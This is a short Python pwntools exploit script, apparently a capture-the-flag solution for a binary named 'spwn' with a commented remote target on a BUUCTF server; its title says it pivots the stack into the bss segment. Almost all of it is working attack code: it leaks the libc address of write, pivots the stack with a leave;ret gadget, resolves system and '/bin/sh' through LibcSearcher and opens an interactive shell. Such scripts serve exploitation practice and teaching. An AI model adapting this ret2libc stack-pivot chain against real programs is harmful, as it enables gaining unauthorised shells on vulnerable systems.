利用bss進行棧遷移
exp
#!/usr/bin/env python3
# coding=utf-8
from pwn import *
from LibcSearcher import *
context(log_level='debug')
proc_name = './spwn'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 29482)
elf = ELF(proc_name)
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
p.recvuntil('name?')
payload = p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload)
bss_addr = 0x804a300
leave_ret = 0x8048408
payload1 = 'a'.encode() * 0x18 + p32(bss_addr - 4) + p32(leave_ret)
p.recvuntil('say?')
p.send(payload1)
write_addr = u32(p.recv(4))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload2 = p32(system_addr) + p32(main_addr) + p32(str_bin_sh)
p.recvuntil('name?')
p.sendline(payload2)
p.recvuntil('say?')
p.sendline(payload1)
p.interactive()
